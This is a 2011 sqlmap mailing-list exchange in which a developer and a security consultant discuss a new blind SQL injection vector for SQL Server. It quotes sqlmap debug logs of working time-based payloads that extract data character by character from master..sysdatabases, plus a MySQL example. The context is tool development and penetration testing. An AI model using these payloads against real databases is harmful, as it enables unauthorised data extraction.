Re: [sqlmap-users] New SQL Server blind test
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] New SQL Server blind test
|
From: Miroslav S. <mir...@gm...> - 2011-01-18 02:05:55
|
well, i've apologized already. i've realized 15 minutes ago that this really is a new sql injection vector. you can find yourself in the latest revision commit of doc/THANKS file. kr On Tue, Jan 18, 2011 at 2:59 AM, Steve Pinkham <ste...@gm...> wrote: > On 01/17/2011 08:25 PM, Miroslav Stampar wrote: >> ok, fair enough. >> >> please just send one of payloads used for data retrieval (something >> like this one): >> >> [02:20:30] [PAYLOAD] 1 AND 9290=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_ >> name AS CHAR), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1), 1, 1)) > >> 104), SLEEP(5), 9290) >> >> you'll see them with -v 3. you can censor table names. please, i just >> want to see something workable used for data retrieval (just spot >> those payloads with '>' inside) >> >> kr > > Since you seem anxious, I'll send the warm up.. Hasn't hit the good part > yet. ;-) > > [09:41:40] [INFO] fetching database names > [09:41:40] [INFO] fetching number of databases > [09:41:40] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 1, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:41:40] [WARNING] time-based comparison needs larger statistical > model. Making a few dummy requests, please wait.. > [09:41:57] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 1, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:42:28] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 1, 1)) > 49) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:42:58] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 1, 1)) > 50) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:42:59] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 2, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 2, 1)) > 54) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 2, 1)) > 52) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 3, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 3, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:43:37] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 3, 1)) > 1) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi > [09:43:37] [INFO] retrieved: 24 > [09:43:37] [DEBUG] performed 10 queries in 117 seconds > > > > -- > | Steven Pinkham, Security Consultant | > | http://www.mavensecurity.com | > | GPG public key ID CD31CAFB | > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
